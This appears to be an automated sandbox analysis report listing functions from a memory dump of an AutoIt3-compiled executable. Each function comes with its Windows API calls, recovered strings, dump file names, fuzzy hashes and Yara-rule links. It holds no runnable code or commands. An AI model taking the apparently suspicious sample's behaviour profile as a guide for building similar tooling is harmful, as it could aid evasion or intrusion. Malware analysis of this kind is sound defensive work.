          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 01194879
          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 011948A1
          • _wcslen.LIBCMT ref: 011948F7
          • _wcslen.LIBCMT ref: 0119490D
          • _wcslen.LIBCMT ref: 0119492C
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _wcslen$Directory$CurrentSystem
          • String ID: D
          • API String ID: 1914653954-2746444292
          • Opcode ID: 8850a2ed2fa7a9d194bb051c1b3addfd2e635e0095ee6bfafba3afbff7c17ab6
          • Instruction ID: 54d70af8f0c275236fe7a67b7ad1858ccd52a2c90e00c562de78452fa1439be2
          • Opcode Fuzzy Hash: 8850a2ed2fa7a9d194bb051c1b3addfd2e635e0095ee6bfafba3afbff7c17ab6
          • Instruction Fuzzy Hash: AAE1F4715083429FD718EF64C984B2BB7E4AFD8718F04892CF99A87750EB35E845CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01132190, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • __wcsicoll.LIBCMT ref: 01132262
          • __wcsicoll.LIBCMT ref: 01132278
          • __wcsicoll.LIBCMT ref: 0113228E
            • Part of subcall function 011413CB: __wcsicmp_l.LIBCMT ref: 0114144B
          • __wcsicoll.LIBCMT ref: 011322A4
          • _wcscpy.LIBCMT ref: 011322C4
          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\77066510\txoxpdjc.qnr,00000104), ref: 01158AD6
          • _wcscpy.LIBCMT ref: 01158B29
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\77066510\txoxpdjc.qnr$CMDLINE$CMDLINERAW
          • API String ID: 574121520-1560520112
          • Opcode ID: 8fc8b323f93851fddd35a55bd31041e432f1de1de8831c32537b12564066ecb5
          • Instruction ID: c69644fa826d0ebadf24eaa37dd61ce2d8934a66c006849a4d12330ca99a6bbe
          • Opcode Fuzzy Hash: 8fc8b323f93851fddd35a55bd31041e432f1de1de8831c32537b12564066ecb5
          • Instruction Fuzzy Hash: A1717E72D1021B9BDF1CFBA5DC91AEE7B74AFA0348F404068D90577188EBB06949CBE1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119910A, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
          Download Yara Rule
          APIs
          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 01199155
          • GetFocus.USER32 ref: 01199169
          • GetDlgCtrlID.USER32 ref: 01199174
          • PostMessageW.USER32(?,00000111,?,00000000), ref: 011991C8
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessagePost$CtrlFocus
          • String ID: 0
          • API String ID: 1534620443-4108050209
          • Opcode ID: a71c570af9f7edbb6845aae0ed065c8e39d9691e5daa8573b7fe5b1fffd06a84
          • Instruction ID: 8b168c365c7e0d4c345504fb19259bb9dc4333a104318af2e51139998dc9d9c9
          • Opcode Fuzzy Hash: a71c570af9f7edbb6845aae0ed065c8e39d9691e5daa8573b7fe5b1fffd06a84
          • Instruction Fuzzy Hash: C491D6716043199FEB28DF28D884BABB7E8FF84718F04451DF9A597281D770E944CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011905C5, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
          Download Yara Rule
          APIs
          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,01157F37,?,0000138C,?,00000001,?,?,?), ref: 011905F5
          • LoadStringW.USER32(00000000,?,01157F37,?), ref: 011905FC
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,01157F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 0119061C
          • LoadStringW.USER32(00000000,?,01157F37,?), ref: 01190623
          • __swprintf.LIBCMT ref: 01190661
          • __swprintf.LIBCMT ref: 01190679
          • _wprintf.LIBCMT ref: 0119072D
          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 01190746
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
          • API String ID: 3631882475-2268648507
          • Opcode ID: 5e5aa6ceb796c17f5f6f625341792a93fd32b570cc623bca014f7001ab76f22f
          • Instruction ID: 301ecf6a04917d615d20148b3b6c8bda71cd6f822058ea0ec26d382489ddcbe3
          • Opcode Fuzzy Hash: 5e5aa6ceb796c17f5f6f625341792a93fd32b570cc623bca014f7001ab76f22f
          • Instruction Fuzzy Hash: 72417F72A0020AABDB18FBA0DC89DEE7B3DAF98755F504025F614B7144EB706E45CBB1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A2095, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
          Download Yara Rule
          APIs
          • GetLocalTime.KERNEL32(?), ref: 011A225C
          • __swprintf.LIBCMT ref: 011A2273
          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,011BBF48), ref: 011A24A6
          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,011BBF48), ref: 011A24C0
          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,011BBF48), ref: 011A24DA
          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,011BBF48), ref: 011A24F4
          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,011BBF48), ref: 011A250E
          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,011BBF48), ref: 011A2528
          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,011BBF48), ref: 011A2542
          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,011BBF48), ref: 011A255C
          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,011BBF48), ref: 011A2576
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FolderPath$LocalTime__swprintf
          • String ID: %.3d
          • API String ID: 3337348382-986655627
          • Opcode ID: 9a3e4e62b0eebb02d65f44f1cce4beccd672c092d7e506809e01dbad71d51019
          • Instruction ID: 68a53fd4ba3e52ddb6994f1dd9ee72a0a3121f821e0628588ff3945ff0933c9d
          • Opcode Fuzzy Hash: 9a3e4e62b0eebb02d65f44f1cce4beccd672c092d7e506809e01dbad71d51019
          • Instruction Fuzzy Hash: 13C1EC32654219ABDB2CFF60DC85FEE7378FB94705F4045AAF509A7084DB719A09CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119138A, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
          • String ID: %s%u
          • API String ID: 1899580136-679674701
          • Opcode ID: 41e2d34cd23455c41558375245ef92531afc408a25719a16a1c657313dcfaa3d
          • Instruction ID: 3e4c08d3ea8d72de368739945e1b967850386d83a73631609c7d9558b151089a
          • Opcode Fuzzy Hash: 41e2d34cd23455c41558375245ef92531afc408a25719a16a1c657313dcfaa3d
          • Instruction Fuzzy Hash: 50A1E872504302ABDF19DF14C884BEE77A9FF84324F048929FDA99B245D770E586CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01161329, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
          Download Yara Rule
          APIs
          • GetDC.USER32(00000000), ref: 0116139D
          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 011613AE
          • CreateCompatibleDC.GDI32(00000000), ref: 011613B8
          • SelectObject.GDI32(00000000,?), ref: 011613C5
          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0116142B
          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 01161464
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
          • String ID: (
          • API String ID: 3300687185-3887548279
          • Opcode ID: 07b60333aa6ffd952ad7b8224e3b0c16a515d30edd18f4cee7d046b132751ae1
          • Instruction ID: 6fc0b8704e7ea9274972d7496c612240a01c51421704170ff38858847f225855
          • Opcode Fuzzy Hash: 07b60333aa6ffd952ad7b8224e3b0c16a515d30edd18f4cee7d046b132751ae1
          • Instruction Fuzzy Hash: A4513C75A00309AFDB28CF98C884FAFBBB9EF49710F108519FA5A97240D771B944CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0116000A, Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
          Download Yara Rule
          APIs
          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 01160030
          • GetFileSize.KERNEL32(00000000,00000000), ref: 0116004B
          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 01160056
          • GlobalLock.KERNEL32 ref: 01160063
          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 01160072
          • GlobalUnlock.KERNEL32(00000000), ref: 01160079
          • CloseHandle.KERNEL32(00000000), ref: 01160080
          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0116008D
          • OleLoadPicture.OLEAUT32(?,00000000,00000000,011B29F8,?), ref: 011600AB
          • GlobalFree.KERNEL32 ref: 011600BD
          • GetObjectW.GDI32(?,00000018,?), ref: 011600E4
          • CopyImage.USER32 ref: 01160115
          • DeleteObject.GDI32(?), ref: 0116013D
          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 01160154
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
          • String ID:
          • API String ID: 3969911579-0
          • Opcode ID: d67f9fbfd8aadf0dda4997fa91b608189108624ad216fabec4a90afa8b36c74a
          • Instruction ID: fa529060101bca642697f704a6d7a83681d6bccd0dcdfc7b3523665689961885
          • Opcode Fuzzy Hash: d67f9fbfd8aadf0dda4997fa91b608189108624ad216fabec4a90afa8b36c74a
          • Instruction Fuzzy Hash: 8E416D75600208AFE729DFA8DC89FAA77B8EF49710F108154FA15EB280D775AD45CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118516A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
          • String ID: 0
          • API String ID: 956284711-4108050209
          • Opcode ID: 984140972d785b03198c4be560c585cfb35a5957a4437be992c21d40a166e83e
          • Instruction ID: 4e53d97b210f7ad1f10cf4993933b679ff975cc4e2a114942944bb8a79c994f7
          • Opcode Fuzzy Hash: 984140972d785b03198c4be560c585cfb35a5957a4437be992c21d40a166e83e
          • Instruction Fuzzy Hash: 9D414E70204302AFE769EF68D8C8B6677AAFF44300F108518F955CB284DB74E885CF61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01163478, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
          • String ID: 0.0.0.0
          • API String ID: 1965227024-3771769585
          • Opcode ID: 88188beaa4871aaf856b1d4c56e961e89e6769e9e2b80400b7d2a3d134776f77
          • Instruction ID: ec7278becbdcf8a76a58d4eac5cfc1fbd45cad896d8a9e2490803f08dc997b87
          • Opcode Fuzzy Hash: 88188beaa4871aaf856b1d4c56e961e89e6769e9e2b80400b7d2a3d134776f77
          • Instruction Fuzzy Hash: 17213D36A101156BC728AB68DC44EFE736CEFA4715F0442A9F91D97140EF71A594C7B0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118F55A, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0118F5C2
          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0118F5D9
          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0118F5EB
          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0118F5FE
          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0118F60B
          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0118F621
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: SendString$_memmove_wcslen
          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
          • API String ID: 369157077-1007645807
          • Opcode ID: ba4f65470815c94452df6c76d697563b2561ce5c0f9ea7144d7a3f913d63ef8a
          • Instruction ID: b90f331b9ebafa86969b1f22287dfb43bec10f6fb03fee8404caff2ec5c60a3a
          • Opcode Fuzzy Hash: ba4f65470815c94452df6c76d697563b2561ce5c0f9ea7144d7a3f913d63ef8a
          • Instruction Fuzzy Hash: 7221A53269021F75E728F7A4DC86FFE7378ABD0B44F104529E614AA0D4DBB06945CB94
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01179112, Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(?,?,000000FF,?), ref: 011791FD
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 01179210
          • CharNextW.USER32(?,?,?,000000FF,?), ref: 01179242
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0117925A
          • SendMessageW.USER32(?,?,00000000,?), ref: 0117928B
          • SendMessageW.USER32(?,?,000000FF,?), ref: 011792A2
          • SendMessageW.USER32(?,?,00000000,00000000), ref: 011792B5
          • SendMessageW.USER32(?,00000402,?), ref: 011792F2
          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 01179366
          • SendMessageW.USER32(?,00001002,00000000,?), ref: 011793D0
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend$CharNext
          • String ID:
          • API String ID: 1350042424-0
          • Opcode ID: 08f5f783c5a92f796fbf31148a8041b89583f69f4d5e41bc600fc321336c7556
          • Instruction ID: 4d1d003bde3a9b9b0bf42ffd9c7d6c940d04b9c49624e06a27d521b8a2d48409
          • Opcode Fuzzy Hash: 08f5f783c5a92f796fbf31148a8041b89583f69f4d5e41bc600fc321336c7556
          • Instruction Fuzzy Hash: 1A81C33560010CABEB28DF58DC85FFEB778EB55734F108269FA249B280D77599498BA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01183126, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __swprintf_wcscpy$__i64tow__itow
          • String ID: %.15g$0x%p$False$True
          • API String ID: 3038501623-2263619337
          • Opcode ID: ba13e97382053f5fda9aa1225434098ea8a19bda499c67387b3c9422d8353efb
          • Instruction ID: c0043477ff2010683bbc2693fb4308cb4d94d4462f365ffa74ee59681f84feff
          • Opcode Fuzzy Hash: ba13e97382053f5fda9aa1225434098ea8a19bda499c67387b3c9422d8353efb
          • Instruction Fuzzy Hash: 4641E8729101119BD71CFB74DC81F6AB368FF65A00F0885A9D909CB244E735E954CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118E525, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
          Download Yara Rule
          APIs
          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0118E56D
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0118E58C
          • __swprintf.LIBCMT ref: 0118E5E3
          • _wprintf.LIBCMT ref: 0118E690
          • _wprintf.LIBCMT ref: 0118E6B4
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
          • API String ID: 2295938435-8599901
          • Opcode ID: da48ddfc9e03fe64237182ba0d79b768a72d1fb9dce4c2285ff171310ba4e6d8
          • Instruction ID: 888345e33a1dce1e970cdcf277a6e8d317f8160dad5c8b8ad86b0e843a312e34
          • Opcode Fuzzy Hash: da48ddfc9e03fe64237182ba0d79b768a72d1fb9dce4c2285ff171310ba4e6d8
          • Instruction Fuzzy Hash: 7B518371E0120AABDB1CFBA4D885DEFB77DAF94744F108029E91567244EB70AE45CFA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A1493, Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
          Download Yara Rule
          APIs
          • GetWindowLongW.USER32(?,000000F0), ref: 011A1496
          • LoadImageW.USER32 ref: 011A14B1
          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 011A14CA
          • DeleteObject.GDI32(?), ref: 011A14D8
          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 011A14E6
          • LoadImageW.USER32 ref: 011A1529
          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 011A1542
          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 011A1563
          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 011A1587
          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 011A1596
          • DeleteObject.GDI32(?), ref: 011A15A4
          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 011A15B2
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
          • String ID:
          • API String ID: 3218148540-0
          • Opcode ID: 3037913640a9c4dc4054c8a0d8c6969a41ee9370a514ad47965b1c36deb349dc
          • Instruction ID: bed921f46791e0192495254bbdc0c95e5179c44e3b87f98246bebd88f202fb97
          • Opcode Fuzzy Hash: 3037913640a9c4dc4054c8a0d8c6969a41ee9370a514ad47965b1c36deb349dc
          • Instruction Fuzzy Hash: 5241B675744309BBEB388E68DC49FAB7BA8EB44721F044519FA52E72C0C770E448C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01196555, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
          Download Yara Rule
          APIs
          • _wcsncpy.LIBCMT ref: 011965DD
          • _wcsncpy.LIBCMT ref: 01196609
